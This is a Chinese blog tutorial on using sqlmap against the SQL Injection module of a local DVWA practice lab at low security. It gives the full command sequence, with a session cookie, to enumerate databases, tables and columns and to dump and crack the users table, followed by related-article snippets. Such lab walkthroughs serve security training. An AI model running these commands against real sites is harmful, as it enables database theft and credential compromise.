dvwa之sql injection之sqlmap工具注入(low版)

最新推荐文章于 2025-03-20 18:25:06 发布
最新推荐文章于 2025-03-20 18:25:06 发布
阅读量1.9k 收藏 10
点赞数 1
分类专栏: web安全 文章标签: dvwa sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csdnmmd/article/details/80110801
版权
本文详细介绍如何使用SQLMap工具进行SQL注入攻击,包括设置安全性级别、使用Cookie维持会话、发现数据库及表信息,并最终获取敏感数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

可能要用到的参数:

-u             指定URL

--cookie     带cookie注入


爆库:

--dbs     发现所有数据库 (参数前有空格)

列出数据库:

--tables     列出数据库表  (参数前有空格)

-D            选择数据库


首先一定先把难度调为low


当写1-5的时候,都会有值出来


直接上工具


如下:Sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id =1&submit=sublit#"


有一个302跳转,跳转到的是登录页面,所以这个时候需要使用cookie进行会话维持,然后使用burpsuite或者是f12都行,找到cookie:


security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5

构造语句:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"

得到的值:



然后进行爆数据库处理:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --dbs

得到的结果如下:


看到了我们想要的

列出数据库表:

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --tables -D dvwa

   -D选项是选择数据库为dvwa

然后 


列出users表的所有字段


–columns -T “users”<列出mysql数据库中的user表的所有字段> (columns参数前带空格)

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"  --columns -T users    //两个--

然后就是使用字典(自带)进行解密

-T users --dump

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"  -T users --dump


中间是y 1 n 回车


结果就出来啦





DVWA-SQL注入sqlmap安装和使用)
weixin_53256941的博客
07-12 1050
一.Python环境安装 链接: https://pan.baidu.com/s/1ZbR6LoKcSvqnF82UZvkesg?pwd=e79b 提取码: e79b 双击安装包进行安装配置环境变量 我的电脑,找到属性点击高级系统设置 出现"系统属性",点击环境变量 在下面的"系统变量"里面找到Path变量点击编辑,(没有的话点击新建)在变量值末尾,填上python安装路径 win+R+cmd打开命令窗口输入python出现此页面表示安装成功 二.Sqlmap安装 链接:https://pan.baidu.
Sqlmap
mumuzi2的博客
02-25 420
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
dvwa的三个模式下sqlmap命令一把梭哈
最新发布
2301_81684021的博客
03-20 308
SQL注入SQL Injection,简称SQLi)是一种常见的网络安全攻击手段。攻击者通过在Web应用程序的输入字段(如表单输入框、URL参数等)中注入恶意的SQL代码,从而欺骗数据库执行这些非预期的指令。这种攻击通常发生在应用程序对用户输入的数据未进行充分验证和过滤的情况下当应用程序将用户输入直接拼接到SQL查询语句中时,攻击者可以构造恶意输入,改变原本SQL语句的结构和逻辑,进而实现对数据库的非法操作。
[DVWA靶场实战]-SQL注入攻击(命令注入+SQL回显注入+sqlmap工具实现自动化注入)详细教程
weixin_60838266的博客
07-24 2549
利用Kali Linux和burpsuite对DVWA靶场的Command Injection模块和SQL Injection模块进行sql注入攻击详细教程,包括使用工具sqlmap进行自动化注入攻击。
DVWA——SQL注入——sqlmap实现
weixin_46709219的博客
11-14 1494
网络安全-sqlmap学习笔记 sqlmap上面的总连接
【渗透测试】 sqlmap工具注入-基于dvwasql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1191
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA-SQL Injection 注入&Sqlmap
原味瓜子、的博客
09-22 503
文章目录SQL注入一、Low等级二、Medium等级三、High等级四、Impossible SQL注入 指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 一、Low等级 1、漏洞分析 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
DVWA通过攻略之SQL注入
热门推荐
勿山几已
05-24 1万+
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 3046
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWA】20. SQL Injection (Blind)SQL注入盲注(全等级Sqlmap
Zichel77的博客
04-08 2511
盲注,有两种主要类型,包括布尔盲注和时间盲注。
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
DVWASQL注入漏洞与SQLmap
leaf_lucky的博客
01-24 945
对于以上两个语句,1=1会正常输出,而1=2 错误输出,可以说明SQL语句生效,SQL语句存在漏洞。用户输入SQL语句,执行了MySQL内置函数user(),database()而对于以下语句,可以发现没有语句,SQL语句变化,1!= 2,不能得到输出。输入上面的语句有正常输出,对于“#”的作用是注释后续SQL语句。点击第一个,找到cookie,复制下来,即是以下语句。上面语句为原本的SQL语句,下面语句为过滤后的语句。对于上面三句语句,依次进行判断,可以得到。输入1' order by 1#得到。
使用sqlmap完成sql注入DVWA
dongf2019的博客
12-12 1156
------------------------------------------------------------------------------------------------------运行结果。4、在kali中启动firefox浏览器,设置代理为127.0.0.1,端口为8080,访问dvwasql injection页面,输入1,submit。显示出users表格所以数据,其中用户密码已经从MD5还原为明文。2、启动dvwa,启动后地址为192.168.88.128。
sql注入low),dvwa环境(小白级别)
weixin_45971397的博客
07-10 457
sql注入low),dvwa环境 本文章是我自己学习时的一点笔记(刚学一个月),如果解释有错误请指出。 1.我们先选择级别为low,点击Submit 然后点击SQL Injection 开始我们的实验 2.在文本框当中输入1,我们可以看到在url当中出现id=1的字样。 sql注入有数字型,字符型,搜索型,布尔型(后两种完全不懂) 因为url中是id所以我们暂时当作是数字型 接下来我们在url和文本框中修改都是可以的。(只是在url要转换编码,我不熟暂时不讲,容易丢人) 2.然后我们试一下and or
使用SQLmapdvwa进行SQL注入测试
yusakul的博客
11-19 3330
SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap 搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwaSQL Injection,打开浏览器调试,输入user id并submit...
DVWA SQL Injection Medium
Ramona的博客
11-27 513
Mdeium 基本的步骤及知识点在上节已经提到过这里不再赘述:https://blog.youkuaiyun.com/WQ_BCJ/article/details/84554777 1)与low级别不同,本次采用的是下拉按钮的方式,限制了用户的输入,通过url可以发现并没有?id=.....类似的参数所以不是get方法,那么我们可以通过火狐的hackbar提交post数据试一试: 2)通过以上页...
sqlmap测试dvwa-sql注入high
qq_39511050的博客
08-12 2103
sqlmap测试dvwa-sql注入high
sqlmap快速上手教程
weixin_34138377的博客
10-31 345
为什么80%的码农都做不了架构师?>>> ...
dvwa中等难度sql注入使用sqlmap
01-04
对于DVWA中的SQL注入漏洞,在中等安全级别下,可以利用`sqlmap`工具来进行自动化检测和数据提取。为了成功实施这一过程,确保设置正确的参数来匹配目标环境的要求。 #### 准备工作 在启动`sqlmap`之前,先要访问...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值